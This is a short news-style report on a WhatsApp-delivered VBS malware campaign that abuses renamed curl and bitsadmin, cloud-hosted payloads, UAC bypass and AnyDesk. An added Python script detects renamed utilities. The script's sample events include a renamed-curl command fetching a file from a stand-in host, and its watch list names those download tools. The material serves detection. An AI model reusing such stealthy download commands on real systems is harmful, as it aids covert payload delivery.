Microsoft has flagged a new cyberattack campaign that uses WhatsApp messages to deliver malicious Visual Basic Script (VBS) files, targeting Windows systems through a multi-stage infection chain.
First observed in late February 2026, the campaign relies heavily on social engineering to trick users into executing the VBS files. Once triggered, the malware creates hidden directories in system paths and deploys renamed versions of legitimate Windows utilities such as curl.exe and bitsadmin.exe, allowing it to blend seamlessly with normal system operations.
The attack progresses by downloading additional payloads from trusted cloud platforms like AWS, Tencent Cloud, and Backblaze B2. These payloads are used to establish persistence and gradually escalate privileges within the infected system.
A key aspect of the campaign is its ability to bypass User Account Control (UAC). The malware repeatedly attempts to execute commands with elevated privileges, modifies registry settings, and weakens system defenses to maintain control. Eventually, it installs malicious MSI packages, including legitimate remote access tools like AnyDesk, enabling continuous access for attackers.
By combining trusted tools, cloud infrastructure, and stealth techniques, this campaign significantly increases its chances of evading detection. It highlights how attackers are evolving their methods to exploit everyday communication platforms and legitimate system utilities to compromise endpoints.
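One way to hunt for the renamed utilities described above is to compare each process's on-disk name with the OriginalFileName from its PE version resource, which survives a simple rename. This is an added example, not part of the original article or Microsoft's detection content. It assumes process-creation events shaped like Sysmon Event ID 1 (fields Image, OriginalFileName, CommandLine); the sample events, paths and URL are constructed.

```python
import ntpath

# Utilities the article names as being deployed under new names.
WATCHED = {"curl.exe", "bitsadmin.exe"}
# Directories where the genuine copies normally live (assumption for this example).
EXPECTED_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


def find_renamed_utilities(events):
    """Return events whose PE OriginalFileName is a watched utility but whose
    on-disk name or directory does not match the genuine copy."""
    findings = []
    for ev in events:
        original = ev.get("OriginalFileName", "").lower()
        if original not in WATCHED:
            continue  # not a watched utility, or the field is missing
        image = ev.get("Image", "")
        name = ntpath.basename(image).lower()
        folder = ntpath.dirname(image).lower()
        reasons = []
        if name != original:
            reasons.append("renamed")
        if folder not in EXPECTED_DIRS:
            reasons.append("unexpected_directory")
        if reasons:
            findings.append({"Image": image, "OriginalFileName": original,
                             "reasons": reasons,
                             "CommandLine": ev.get("CommandLine", "")})
    return findings


# Constructed sample events, not taken from the campaign.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": "curl.exe --version"},
    {"Image": r"C:\ProgramData\ExampleDir\svchelper.exe", "OriginalFileName": "curl.exe",
     "CommandLine": "svchelper.exe -o out.bin https://storage.example.invalid/a"},
    {"Image": r"C:\ProgramData\ExampleDir\bitsadmin.exe", "OriginalFileName": "bitsadmin.exe",
     "CommandLine": "bitsadmin.exe /list"},
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for f in find_renamed_utilities(SAMPLE_EVENTS):
        print(f["Image"], f["OriginalFileName"], ",".join(f["reasons"]))
```

Events that lack the OriginalFileName field are skipped, so the check only works where the logging source records it.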




